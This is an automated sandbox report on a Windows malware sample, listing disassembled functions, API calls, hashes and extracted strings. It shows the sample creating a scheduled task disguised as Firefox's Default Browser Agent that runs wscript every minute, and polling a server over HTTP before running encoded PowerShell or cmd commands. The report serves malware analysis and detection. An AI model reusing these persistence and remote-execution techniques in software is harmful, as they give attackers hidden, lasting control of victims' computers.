Source File: 00000000.00000002.2028084855.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.2028070861.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028104802.0000000000FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028122229.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028137111.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_SecuriteInfo.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 30d348132ac4017b3b9289eb6d3b9e11e65a990b9025cc1fb60ec3879aa4fa1a
Instruction ID: 1b421bd70c862c4193518245d382cccf6a61193d3331680e850ad03c734d005b
Opcode Fuzzy Hash: 30d348132ac4017b3b9289eb6d3b9e11e65a990b9025cc1fb60ec3879aa4fa1a
Instruction Fuzzy Hash: 9BE04631448288ABCF213F15CE4AD883B69FB81352F100010FA0586132CB39DD92EF50

Uniqueness

Uniqueness Score: -1.00%

Function 00FBE87D Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00FBE878,?,?,00000008,?,?,00FBE510,00000000), ref: 00FBEAAA

Memory Dump Source

Source File: 00000000.00000002.2028084855.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.2028070861.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028104802.0000000000FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028122229.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028137111.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_SecuriteInfo.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: c649b98d156a46cfd1fc27fbc6b47870bc95bc39a12e1a810895fc48d741d2ff
Instruction ID: acc35d396a77b0081e7d5513b76289d1dbeba178f6f7a1c5c637e81d9acc7cb3
Opcode Fuzzy Hash: c649b98d156a46cfd1fc27fbc6b47870bc95bc39a12e1a810895fc48d741d2ff
Instruction Fuzzy Hash: 3DB13932A10609DFD718CF29C486BE57BA0FF45364F298658E89ACF2A1C335E991DF40

Uniqueness

Uniqueness Score: -1.00%

Function 00FB44C5 Relevance: 1.6, APIs: 1, Instructions: 147COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00FB44DB

Memory Dump Source

Source File: 00000000.00000002.2028084855.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.2028070861.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028104802.0000000000FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028122229.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028137111.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_SecuriteInfo.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: c0ee7600c721f8a9a4210c69e8ac20a83d6d2ad1ec8dc946fe1941f4640c1ebe
Instruction ID: f7dab8e09dbb3d0a261a001c19342bae4f4c40b89f0579fdf7d2ff1f5e5820ad
Opcode Fuzzy Hash: c0ee7600c721f8a9a4210c69e8ac20a83d6d2ad1ec8dc946fe1941f4640c1ebe
Instruction Fuzzy Hash: FF51B8B1E016198FDB28CF59DA86B9EBBF0FB48360F14842AD401EB251DB74E941EF50

Uniqueness

Uniqueness Score: -1.00%

Function 00FB8ACD Relevance: 1.6, APIs: 1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2028084855.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.2028070861.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028104802.0000000000FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028122229.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028137111.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4be6771d56c3ed59c3432d7c320487790cb4c5a074a8accac0640832697912c
Instruction ID: ecdf0f6ea36981bd34612658f50de241b6bd3c75dd1ecf2c6b845d67fce3677a
Opcode Fuzzy Hash: d4be6771d56c3ed59c3432d7c320487790cb4c5a074a8accac0640832697912c
Instruction Fuzzy Hash: F331A0B2900219AFCB24DE6ACC89DEB7BADEBC4350F548158F91597240EE30AE41DE50

Uniqueness

Uniqueness Score: -1.00%

Function 005A2490 Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 005A2492

Memory Dump Source

Source File: 00000000.00000002.2027880689.00000000005A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000000.00000002.2027837170.00000000005A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2027901013.00000000005AB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a0000_SecuriteInfo.jbxd

Similarity

API ID: CountTick
String ID:
API String ID: 536389180-0
Opcode ID: 4e03e929300577b5517363fd8dee14eb36406371d76b7d2575a842878f175bab
Instruction ID: 58b8204672cc958809dd9d2eae68a698a56a703d1eb1594d0bb7bfe6150fc037
Opcode Fuzzy Hash: 4e03e929300577b5517363fd8dee14eb36406371d76b7d2575a842878f175bab
Instruction Fuzzy Hash: BE31C3727104018FC74CCF2CEC9AA2977E5F79F310B158629E52ACB2A0E770E85ADB41

Uniqueness

Uniqueness Score: -1.00%

Function 00FB43AF Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_000043BB,00FB3BBB), ref: 00FB43B4

Memory Dump Source

Source File: 00000000.00000002.2028084855.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.2028070861.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028104802.0000000000FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028122229.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028137111.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_SecuriteInfo.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: d889ab228e4923bf8a608b50e285ff58caca2ae7bc828bd43ba7c22a1239ab11
Instruction ID: e001a5222cb14756094811e753f66b7cbfa58501ea345539d8b5e8c8a39a2916
Opcode Fuzzy Hash: d889ab228e4923bf8a608b50e285ff58caca2ae7bc828bd43ba7c22a1239ab11
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 005A7430 Relevance: 1.4, Strings: 1, Instructions: 159COMMON

Download Yara Rule

Strings

0, xrefs: 005A7490

Memory Dump Source

Source File: 00000000.00000002.2027880689.00000000005A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000000.00000002.2027837170.00000000005A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2027901013.00000000005AB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 97408d208d436d56f55ab8464978196798b9c5da84c9ea22eb9ce05b42d4b2d2
Instruction ID: e2bc6d53142a34428658796146022662732cad6821020a506e479c7d0ff9b4d6
Opcode Fuzzy Hash: 97408d208d436d56f55ab8464978196798b9c5da84c9ea22eb9ce05b42d4b2d2
Instruction Fuzzy Hash: 5151D331E182DC4EDF1D8BEC88542ECBFB1AF57200F5441BEDC9AAB643D5284A49CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00FBA845 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00FBA845

Memory Dump Source

Source File: 00000000.00000002.2028084855.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.2028070861.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028104802.0000000000FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028122229.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028137111.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_SecuriteInfo.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: a4418388432c6526736f6cf0986750d1e93bf90a7a7617c76ad5d96a74c4bf30
Instruction ID: dd80ec5bc6b500e616a14d09ba72f4c5c7f68b0d0989fd9ad1b730e9422abf4b
Opcode Fuzzy Hash: a4418388432c6526736f6cf0986750d1e93bf90a7a7617c76ad5d96a74c4bf30
Instruction Fuzzy Hash: 95A012306001448B5300CF315B0B648369C670168031440545005C3120DB2440506611

Uniqueness

Uniqueness Score: -1.00%

Function 005A4650 Relevance: .8, Instructions: 750COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2027880689.00000000005A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000000.00000002.2027837170.00000000005A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2027901013.00000000005AB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5af9fe35f410722b11439b25dc8b12d495b6d2046dea1679e4726e7ad0816820
Instruction ID: 21bcd49688500d44c3537db910acc6f151195e29ad0d90501387f078f8602659
Opcode Fuzzy Hash: 5af9fe35f410722b11439b25dc8b12d495b6d2046dea1679e4726e7ad0816820
Instruction Fuzzy Hash: DC722D3481819A8EDB18EB68D86AAEC7B74FF53300F5401FDD44A13957AF311A8ACF65

Uniqueness

Uniqueness Score: -1.00%

Function 005A4250 Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2027880689.00000000005A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000000.00000002.2027837170.00000000005A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2027901013.00000000005AB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7296c3b1dbb1a921ba32d64bab04859c0bfcd0fa31f9d19202da488f17fec2c
Instruction ID: 30c601da28732d0c86addaa5ccfa9ad3a7112a4d71085d051946d182f3a63628
Opcode Fuzzy Hash: c7296c3b1dbb1a921ba32d64bab04859c0bfcd0fa31f9d19202da488f17fec2c
Instruction Fuzzy Hash: D95164B1A11A10CFCB68CF2EC591556BBF1BF8C324355896EA98ACB625E334F840CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00FB9763 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2028084855.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.2028070861.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028104802.0000000000FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028122229.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028137111.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe8cb0350e4e3b143060300173f47f5aae99c96b2ead98911347758da5d435a3
Instruction ID: 05caf322940a0fb899fade441a676c798b499b5233bcc57d424d17a3546c2bed
Opcode Fuzzy Hash: fe8cb0350e4e3b143060300173f47f5aae99c96b2ead98911347758da5d435a3
Instruction Fuzzy Hash: 7CE08C72925238EBCB24DF8EC944A8AF7ECEB84B50B254496B601D3101C6B4DF04DBD0

Uniqueness

Uniqueness Score: -1.00%

Function 005A6BB0 Relevance: 70.4, APIs: 31, Strings: 9, Instructions: 426
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32(?), ref: 005A6BCE
CoCreateInstance.OLE32(005A1020,00000000,00000001,005A1000,?,?,75920EE0), ref: 005A6BFB
SysAllocString.OLEAUT32(005A1498), ref: 005A6C41
SysFreeString.OLEAUT32(?), ref: 005A6C7E
SysAllocString.OLEAUT32(\Mozilla), ref: 005A6C8F
SysFreeString.OLEAUT32(00000000), ref: 005A6CB1
SysAllocString.OLEAUT32(\Mozilla), ref: 005A6CC2
SysFreeString.OLEAUT32(00000000), ref: 005A6CD8
SysAllocString.OLEAUT32(Firefox Default Browser Agent 458046B0AF4A39CB), ref: 005A6CE6
SysFreeString.OLEAUT32(00000000), ref: 005A6CF7
SysAllocString.OLEAUT32(The Default Browser Agent task checks when the default changes from Firefox to another browser. If the change happens under suspic), ref: 005A6D34
SysFreeString.OLEAUT32(00000000), ref: 005A6D43
SysAllocString.OLEAUT32(Mozilla), ref: 005A6D4A
SysFreeString.OLEAUT32(00000000), ref: 005A6D59
SysAllocString.OLEAUT32(PT0S), ref: 005A6DAE
SysFreeString.OLEAUT32(00000000), ref: 005A6DBD
SysAllocString.OLEAUT32(Trigger1), ref: 005A6E2F
SysFreeString.OLEAUT32(00000000), ref: 005A6E3E
SysAllocString.OLEAUT32(2023-01-01T12:00:00), ref: 005A6E45
SysFreeString.OLEAUT32(00000000), ref: 005A6E54
SysAllocString.OLEAUT32(PT1M), ref: 005A6E73
SysFreeString.OLEAUT32(00000000), ref: 005A6E82
SysAllocString.OLEAUT32(C:\Windows\System32\wscript.exe), ref: 005A6F03
SysFreeString.OLEAUT32(00000000), ref: 005A6F12
SysAllocString.OLEAUT32(?), ref: 005A6F1C
SysFreeString.OLEAUT32(00000000), ref: 005A6F2B
VariantInit.OLEAUT32(?), ref: 005A6F5A
SysAllocString.OLEAUT32(005A113C), ref: 005A6F6E
SysAllocString.OLEAUT32(Firefox Default Browser Agent 458046B0AF4A39CB), ref: 005A6F7F
SysFreeString.OLEAUT32(00000000), ref: 005A6FBC
VariantClear.OLEAUT32(?), ref: 005A6FC2

Strings

PT1M, xrefs: 005A6E6E
Firefox Default Browser Agent 458046B0AF4A39CB, xrefs: 005A6CE1, 005A6F70
The Default Browser Agent task checks when the default changes from Firefox to another browser. If the change happens under suspic, xrefs: 005A6D2F
Trigger1, xrefs: 005A6E2A
PT0S, xrefs: 005A6DA9
C:\Windows\System32\wscript.exe, xrefs: 005A6EFE
2023-01-01T12:00:00, xrefs: 005A6E40
Mozilla, xrefs: 005A6D45
\Mozilla, xrefs: 005A6C8A, 005A6CBD

Memory Dump Source

Source File: 00000000.00000002.2027880689.00000000005A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000000.00000002.2027837170.00000000005A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2027901013.00000000005AB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a0000_SecuriteInfo.jbxd

Similarity

API ID: String$Alloc$Free$Variant$Init$ClearCreateInstance
String ID: 2023-01-01T12:00:00$C:\Windows\System32\wscript.exe$Firefox Default Browser Agent 458046B0AF4A39CB$Mozilla$PT0S$PT1M$The Default Browser Agent task checks when the default changes from Firefox to another browser. If the change happens under suspic$Trigger1$\Mozilla
API String ID: 3904693211-711907784
Opcode ID: b72effa7f543e079a4e1eca231a7003a60452f6d926d21e68b047dfd6accc944
Instruction ID: 28654acd32d82e85f43ab99f35596dae99ee6033021834022db996e71a92b268
Opcode Fuzzy Hash: b72effa7f543e079a4e1eca231a7003a60452f6d926d21e68b047dfd6accc944
Instruction Fuzzy Hash: FCF1FA74A00219AFDB10DBA9C948FAEBBF8FF4A314F144158F509EB250DB71AD45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 005A7D40 Relevance: 61.6, APIs: 21, Strings: 14, Instructions: 350
libraryloadersleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 005A7D66
GetTickCount64.KERNEL32 ref: 005A7D74

Part of subcall function 005A6690: ObtainUserAgentString.URLMON(00000000,?,?), ref: 005A66B2
Part of subcall function 005A6690: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 005A66D2
Part of subcall function 005A6690: InternetOpenW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 005A6738
Part of subcall function 005A6690: InternetSetOptionW.WININET(00000000,00000002,0000EA60,00000004), ref: 005A6771
Part of subcall function 005A6690: InternetConnectW.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 005A678E
Part of subcall function 005A6690: HttpOpenRequestW.WININET(00000000,POST,?,00000000,00000000,00000000,80403000,00000000), ref: 005A67C7
Part of subcall function 005A6690: InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 005A67F0

Sleep.KERNEL32(00000000), ref: 005A7DC6
lstrcmpA.KERNEL32(00000000,INIT), ref: 005A7DD3
StrToIntA.SHLWAPI(00000000), ref: 005A7E96
StrToIntA.SHLWAPI(00000000), ref: 005A7EDB
GetSystemDirectoryW.KERNEL32(?,00000104), ref: 005A7F17
PathCombineW.SHLWAPI(?,?,WindowsPowerShell\v1.0\powershell.exe), ref: 005A7F30
wnsprintfW.SHLWAPI ref: 005A7F44
ExpandEnvironmentStringsW.KERNEL32(%ComSpec%,?,00000104), ref: 005A7F80
wnsprintfW.SHLWAPI ref: 005A7F94

Part of subcall function 005A5600: GetProcessHeap.KERNEL32(00000000,00000000,005A82E5), ref: 005A5607
Part of subcall function 005A5600: HeapFree.KERNEL32(00000000), ref: 005A560E

GetModuleHandleA.KERNEL32(kernel32), ref: 005A7FB7
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 005A7FC5
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 005A7FDA
LoadLibraryA.KERNEL32(shell32,ShellExecuteW), ref: 005A803B
GetProcAddress.KERNEL32(00000000), ref: 005A8042
wsprintfA.USER32 ref: 005A80A2
wnsprintfA.SHLWAPI ref: 005A80CE

Part of subcall function 005A2740: GetProcessHeap.KERNEL32(00000008,?), ref: 005A2752
Part of subcall function 005A2740: HeapAlloc.KERNEL32(00000000), ref: 005A2759

Sleep.KERNEL32(00000000), ref: 005A82F6

Strings

/c %S, xrefs: 005A7F8A
%ComSpec%, xrefs: 005A7F7B
ShellExecuteW, xrefs: 005A8031
-enc %S, xrefs: 005A7F3A
INIT, xrefs: 005A7DCD
shell32, xrefs: 005A8036
Wow64RevertWow64FsRedirection, xrefs: 005A7FCB
open, xrefs: 005A8050
%d|%s, xrefs: 005A7D60
%s|%s, xrefs: 005A80C4
Wow64DisableWow64FsRedirection, xrefs: 005A7FBF
kernel32, xrefs: 005A7FA4
%d|%s|%.16s|, xrefs: 005A809C
WindowsPowerShell\v1.0\powershell.exe, xrefs: 005A7F1D

Memory Dump Source

Source File: 00000000.00000002.2027880689.00000000005A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000000.00000002.2027837170.00000000005A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2027901013.00000000005AB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a0000_SecuriteInfo.jbxd

Similarity

API ID: HeapInternet$AddressProcwnsprintf$OpenOptionProcessSleepwsprintf$AgentAllocByteCharCombineConnectCount64DirectoryEnvironmentExpandFreeHandleHttpLibraryLoadModuleMultiObtainPathQueryRequestStringStringsSystemTickUserWidelstrcmp
String ID: -enc %S$ /c %S$%ComSpec%$%d|%s$%d|%s|%.16s|$%s|%s$INIT$ShellExecuteW$WindowsPowerShell\v1.0\powershell.exe$Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32$open$shell32
API String ID: 1920831074-1153165106
Opcode ID: 4e2ce8315e3fbf54cf3992cb71974383dd7cd87cca690a26ac895320d841959e
Instruction ID: 3d9fc9236611e804888e121891d219ade99241fd1ab892901109a514c7eeb501
Opcode Fuzzy Hash: 4e2ce8315e3fbf54cf3992cb71974383dd7cd87cca690a26ac895320d841959e
Instruction Fuzzy Hash: F2C1B371E00609ABDB14EBB4CC8DBBE7FB5BF8A300F504529E516A7291EB745E04CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00FB2AE0 Relevance: 37.0, APIs: 3, Strings: 18, Instructions: 276
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00FB3040: char_traits.LIBCPMTD ref: 00FB3080

Part of subcall function 00FB26F0: operator!=.LIBCPMTD ref: 00FB27B9
Part of subcall function 00FB26F0: task.LIBCPMTD ref: 00FB27CA
Part of subcall function 00FB26F0: task.LIBCPMTD ref: 00FB27D9

Part of subcall function 00FB2870: task.LIBCPMTD ref: 00FB2889

Part of subcall function 00FB2A60: task.LIBCPMTD ref: 00FB2AB3
Part of subcall function 00FB2A60: task.LIBCPMTD ref: 00FB2AC2

task.LIBCPMTD ref: 00FB2C96

Part of subcall function 00FB2450: task.LIBCPMTD ref: 00FB24E6
Part of subcall function 00FB2450: task.LIBCPMTD ref: 00FB24F2
Part of subcall function 00FB2450: task.LIBCPMTD ref: 00FB24FE
Part of subcall function 00FB2450: task.LIBCPMTD ref: 00FB250A
Part of subcall function 00FB2450: task.LIBCPMTD ref: 00FB2519

Part of subcall function 00FB1BD0: task.LIBCPMTD ref: 00FB1C63
Part of subcall function 00FB1BD0: task.LIBCPMTD ref: 00FB1C72

Part of subcall function 00FB1D30: operator!=.LIBCPMTD ref: 00FB1DB9
Part of subcall function 00FB1D30: task.LIBCPMTD ref: 00FB1DC7
Part of subcall function 00FB1D30: task.LIBCPMTD ref: 00FB1DD6

Part of subcall function 00FB1E90: task.LIBCPMTD ref: 00FB1F50
Part of subcall function 00FB1E90: task.LIBCPMTD ref: 00FB1F5F

Part of subcall function 00FB1FF0: task.LIBCPMTD ref: 00FB204A
Part of subcall function 00FB1FF0: task.LIBCPMTD ref: 00FB2056
Part of subcall function 00FB1FF0: task.LIBCPMTD ref: 00FB2065

Part of subcall function 00FB2090: task.LIBCPMTD ref: 00FB20E6

task.LIBCPMTD ref: 00FB2E58
task.LIBCPMTD ref: 00FB2EFC

Part of subcall function 00FB21A0: operator!=.LIBCPMTD ref: 00FB2294
Part of subcall function 00FB21A0: task.LIBCPMTD ref: 00FB22A5
Part of subcall function 00FB21A0: task.LIBCPMTD ref: 00FB22B4

Strings

bbiubmprfbqjoqmoqgmhttblufpjlpiycsqtnqcoidbvmqtfgcahfg, xrefs: 00FB2CFB
syntqwezljesnhnfjaztdeotfzpejojodftab, xrefs: 00FB2EB0
rhfqtvjgvstrbnxfbnisqywuttgleakvwhpeikxktmpncjovllsttlwtunsrbejgntaohynvb, xrefs: 00FB2C52
cynilnsopurpkzljbcyibniozvcvlhljsiueoaxlduusesgcbvealyqlqegiho, xrefs: 00FB2E11
brdvmbhfixnfjkixadthcpzymiljlvidbiypcfxqaqvxdznkshnertbatlamlvhvlgiqevborbhuzis, xrefs: 00FB2E7E
rvoctmqczfvawqbqstoqximnlajullkwbhpoyeksejkprviaewktleabpmhofo, xrefs: 00FB2DE8
sqfyhcibiyaixyvseuhuztdlx, xrefs: 00FB2C6B
ckedhkwnzqenzdyullzbnlnfpdmbxpbrmyhyhqfwzycsbmtpacpudhvlrkopimgkhhund, xrefs: 00FB2C12
yavuryeiymqfxujpmpqrmrmgttalagszlfjtclxxzlbqegipvgwbufy, xrefs: 00FB2E36
jlsnfghtfqpdrihxdjmbpgukkyazsxnkrrfoklsrhiihyccjuobgwyiscunlu, xrefs: 00FB2D8A
upwxgfoqwdhvhqqbodaeivuwrsbjowftepjuayrfsskdseaqlqzsrzyylrwhxudritnoznhlmmukgfgilepjjfsxufyryctzs, xrefs: 00FB2B5E
gcgcdlmeebjfufktvnrctczymerylzxsfqamppfwqjtheyqzdwlhj, xrefs: 00FB2ECF
fuisqwdbksjnkwghhwh, xrefs: 00FB2CC8
nuotrqlghjnffzskkcwufalzlmyscmjdepuxlmxsvppqivxsccetooswpjxeizyhfgqglaeuxevfergpdysqykuppgggs, xrefs: 00FB2DA3
shtumcttjzvhu, xrefs: 00FB2E65
jreqifbqorpfxictktaxizwicpwxilbgtncfyasmvhfyvtkowlhcd, xrefs: 00FB2E97
gcwignkebqvuaflqwaofoeamhtzhtayjmihwxiltntgdrauzzhbrgaocoaklskbiaxlskzepppflnzfykkxivzoa, xrefs: 00FB2D71
bfbkxdptzcljwinnfpjguspcvlgirgvdegdeqisttxcrywkudyppsifzvxs, xrefs: 00FB2BAF

Memory Dump Source

Source File: 00000000.00000002.2028084855.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.2028070861.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028104802.0000000000FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028122229.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2028137111.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_SecuriteInfo.jbxd

Similarity

API ID: task$operator!=$char_traits
String ID: bbiubmprfbqjoqmoqgmhttblufpjlpiycsqtnqcoidbvmqtfgcahfg$bfbkxdptzcljwinnfpjguspcvlgirgvdegdeqisttxcrywkudyppsifzvxs$brdvmbhfixnfjkixadthcpzymiljlvidbiypcfxqaqvxdznkshnertbatlamlvhvlgiqevborbhuzis$ckedhkwnzqenzdyullzbnlnfpdmbxpbrmyhyhqfwzycsbmtpacpudhvlrkopimgkhhund$cynilnsopurpkzljbcyibniozvcvlhljsiueoaxlduusesgcbvealyqlqegiho$fuisqwdbksjnkwghhwh$gcgcdlmeebjfufktvnrctczymerylzxsfqamppfwqjtheyqzdwlhj$gcwignkebqvuaflqwaofoeamhtzhtayjmihwxiltntgdrauzzhbrgaocoaklskbiaxlskzepppflnzfykkxivzoa$jlsnfghtfqpdrihxdjmbpgukkyazsxnkrrfoklsrhiihyccjuobgwyiscunlu$jreqifbqorpfxictktaxizwicpwxilbgtncfyasmvhfyvtkowlhcd$nuotrqlghjnffzskkcwufalzlmyscmjdepuxlmxsvppqivxsccetooswpjxeizyhfgqglaeuxevfergpdysqykuppgggs$rhfqtvjgvstrbnxfbnisqywuttgleakvwhpeikxktmpncjovllsttlwtunsrbejgntaohynvb$rvoctmqczfvawqbqstoqximnlajullkwbhpoyeksejkprviaewktleabpmhofo$shtumcttjzvhu$sqfyhcibiyaixyvseuhuztdlx$syntqwezljesnhnfjaztdeotfzpejojodftab$upwxgfoqwdhvhqqbodaeivuwrsbjowftepjuayrfsskdseaqlqzsrzyylrwhxudritnoznhlmmukgfgilepjjfsxufyryctzs$yavuryeiymqfxujpmpqrmrmgttalagszlfjtclxxzlbqegipvgwbufy
API String ID: 1022754510-231213261
Opcode ID: 6b9f6607a455126810d3cad92ef0a42ff81ce3c2c9a0ddb691ed4f5713c08134
Instruction ID: 276138f7133502140896add050595ba2a440454092404297de499a6267daff77
Opcode Fuzzy Hash: 6b9f6607a455126810d3cad92ef0a42ff81ce3c2c9a0ddb691ed4f5713c08134
Instruction Fuzzy Hash: C6B18170E547089ACB00FF79CE17B9EBB71AF46B44F40025DE4417B2C1EB755A44AB92

Uniqueness

Uniqueness Score: -1.00%

Function 00FB21A0 Relevance: 28.2, APIs: 10, Strings: 6, Instructions: 158COMMON

Download Yara Rule

APIs

Part of subcall function 00FB3040: char_traits.LIBCPMTD ref: 00FB3080

operator!=.LIBCPMTD ref: 00FB2294
task.LIBCPMTD ref: 00FB22A5
